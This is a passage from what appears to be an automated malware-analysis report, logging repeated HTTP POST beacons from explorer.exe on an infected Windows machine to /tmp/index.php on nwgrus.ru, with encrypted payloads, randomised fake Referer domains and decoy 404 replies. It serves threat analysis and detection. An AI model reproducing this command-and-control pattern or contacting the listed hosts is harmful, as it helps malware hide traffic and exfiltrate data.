                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            34192.168.2.449812189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:53:04.992335081 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://fgbayjdhmimo.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 156
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:53:04.992361069 CEST156OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 56 2a b5 a0
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[+k,vuV*j}vxPF_PoHJ>vV<\UI/JTLb<K<
                                                                            Oct 14, 2024 01:53:06.098270893 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:53:05 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            35192.168.2.45003758.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:54:15.511869907 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://ecwlvrprlkc.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 204
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:54:15.511869907 CEST204OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 4b b3 f0
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vu=K#xb|Dg0KnX{H({|`+_@g :1PIR_d}i%R"^+$w9IV
                                                                            Oct 14, 2024 01:54:18.021929979 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:54:17 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            36192.168.2.45003858.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:54:22.523246050 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://pfvfrxtosmhgis.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 162
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:54:22.523262978 CEST162OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 1c ee 8a
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vu:Egp[}PssjNwTX#7$4`[CjpvA3
                                                                            Oct 14, 2024 01:54:25.117286921 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:54:24 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            37192.168.2.45003958.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:54:29.629760027 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://qrcepyiavbj.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 165
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:54:29.629771948 CEST165OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 4b fd 84
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vugKl[xHtTFw$tHkoiI)W>>2,s1%h(
                                                                            Oct 14, 2024 01:54:31.239456892 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:54:30 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.45004058.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:54:35.423472881 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://jbughtdilxsi.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 122
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:54:35.423472881 CEST122OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 38 ed 96
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vu48S<^L{mp|8"ar)_X1
                                                                            Oct 14, 2024 01:54:37.062496901 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:54:36 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.2.45004158.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:54:42.302177906 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://adulmxafuqyrwioa.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 311
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:54:42.302210093 CEST311OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 22 bd 93
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuc"[6~SBDMr6L3~lb:>CXSQ$'}6<,~}7%-o/)9QAm]zOQN5B#rRS\!ZfUsj\q
                                                                            Oct 14, 2024 01:54:43.975779057 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:54:43 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            40192.168.2.45004258.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:54:48.581429005 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://ibqsdsbooxlotmkk.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 311
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:54:48.581461906 CEST311OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 2c bc eb
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vu+,c:@y?F&.2y-DwgoFVRx4E}.QAh!d]r*&W4<GP*4`@L'?`[4ZJ
                                                                            Oct 14, 2024 01:54:50.179156065 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:54:49 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            41192.168.2.45004358.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:54:55.413235903 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://firvhcleclspvqf.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 332
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:54:55.413260937 CEST332OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 42 c8 8b
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vu+BG4gA8B\jL}(}t,/ZS6D~X%CLFFHse63WZq1Im\NP|^"V/3&
                                                                            Oct 14, 2024 01:54:56.987704039 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:54:56 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            42192.168.2.45004458.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:01.435952902 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://wastiylaaiv.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 285
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:01.435983896 CEST285OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 2f b6 8a
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuM/PJK?0Az*G9^Np8Z%R+[KecG6j|RO&vA-oDH1pQ6sJf'{bjY'.
                                                                            Oct 14, 2024 01:55:03.107470036 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:02 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            43192.168.2.45004558.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:08.440407991 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://gmunjwtmmqbkfjxj.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 217
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:08.440407991 CEST217OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 0c b8 87
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuJq\Fd~kUJ)~ln!la?PQ27Oo.NPm]]t?+__;P"'!y"
                                                                            Oct 14, 2024 01:55:09.949276924 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:09 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            44192.168.2.45004658.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:15.616013050 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://ekdlxdwusihebwve.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 326
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:15.616063118 CEST326OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 06 d4 b6
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuJL1OppO?e;=-|"JGjFWZijM_zWN!DP6>cZ@*,\60du{?_LX14
                                                                            Oct 14, 2024 01:55:17.943950891 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:17 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            45192.168.2.45004758.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:22.610935926 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://ytxsvmhxdoiv.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 157
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:22.610937119 CEST157OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 76 18 a8 8b
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuvnH1WVbxpE.X",B%ZX9\:
                                                                            Oct 14, 2024 01:55:24.219738007 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:23 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            46192.168.2.45004858.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:28.585405111 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://cjgfbmyhhfmho.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 369
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:28.585429907 CEST369OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 0b d0 9f
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuyp@wn#@Cx:S*+[^P2jV1FQnwpE.V&!`*_U_CL.jnXj],F<CkTT7t
                                                                            Oct 14, 2024 01:55:30.260673046 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:29 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            47192.168.2.45004958.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:35.118352890 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://ewwaevdbcqu.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 241
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:35.118386984 CEST241OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 32 ff e4
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vu}2~^n9ap;=p)8"1On8&4T#pKQp|1[InmNk3\ -vuGqHYN)d#Tz
                                                                            Oct 14, 2024 01:55:37.592566013 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:37 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            48192.168.2.45005058.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:42.383274078 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://paccyqypahp.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 174
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:42.383285999 CEST174OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6c 5b c0 9e
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vul[x}z25!y)CD~v>J/ ,x29j7<?s<%AEz
                                                                            Oct 14, 2024 01:55:44.025274038 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:43 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            49192.168.2.45005158.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:48.557193041 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://vobnbocmacccbp.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 362
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:48.557193041 CEST362OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 38 e4 e9
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vu|8i5[b]q4DIcT6?8FU?e3d>*-gyR,!(s-$kX@:5jwt;M|]fr69
                                                                            Oct 14, 2024 01:55:51.157521009 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:50 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            50192.168.2.45005258.151.148.90802580C:\Windows\explorer.exe
